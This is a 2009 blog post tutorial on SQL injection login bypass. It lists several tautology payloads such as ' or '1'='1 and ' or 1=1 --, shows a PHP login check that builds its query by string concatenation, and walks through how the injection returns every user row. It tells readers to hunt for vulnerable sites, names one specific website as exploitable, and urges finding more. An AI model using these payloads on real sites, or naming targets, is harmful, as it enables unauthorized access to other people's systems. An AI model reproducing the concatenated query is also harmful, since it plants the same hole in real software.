Wednesday, December 9, 2009

SQL Injection - Part 1

Structure Query Language

' or '1'='1 Injection


It is a technique to inject SQL query as an input possibly via web pages. Actually the logic to validate the authenticity of users is manipulated by using some extra sql query. Many web pages take parameters from web user, and make SQL query to the database. For example when a user login, web page that user name and password and make SQL query to the database to check if a user has valid name and password. It is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant to enter into the website.

This is my first article on SQL Injection. So, here we will see how to inject sql query in username and password fields to grant acess to the website. Not all websites are vulnerable to SQL Injection. We have to search websites those are vunerable to SQL Injection. This is simple.

Just enter ' or 'a'='a in username and password field and click login.

List of golden query:
All the following codes can be used for SQL Injection.
  • ' or 'a'='a
  • ' or '1'='1
  • ' or '0'='0
  • ' or '007'='007
  • ' or 'biti'='biti
  • ' or 'technozone'='technozone
  • ' or 1=1 --
Example:
Following PHP code is for validating the authenticity of the user.


$_SESSION['username']=$_POST["username"];
$_SESSION['password']=$_POST["password"]; 

// query for a user/pass match
$result=mysql_query("select * from users where username='" . $_SESSION['username'] . "' and password='" . $_SESSION['password'] . "'");

// retrieve number of rows resulted
$num=mysql_num_rows($result);

if($num < 1)
{
    //Login Failed
    header('Refresh: 2; URL=login.php?msg=login_failed');
}
else
{
    //Login Sucessfull
    header('Refresh: 2;URL=admin/admin_home.php?msg=login_success');
}

So, if we put ' or 'a'='a in username and password field the query for a user/pass matchwill become


$result=mysql_query("select * from users where username='' or 'a'='a' and password='' or 'a' ='a' );
The above statement will now give all the data from the table users because both the conditions are true. And according to the logic of the user validation code the golden query ' or 'a'='a will help us to enter into the website.

I have found a vulnerable site where you can use this golden query ' or 'a'='a . This vulnerable website belongs to a institution related to IIT JEE Coaching. The site is www.fiitjee.com .

Friends search for more vulnerable site and inform them for the vulnerability.





(Read more inside ..)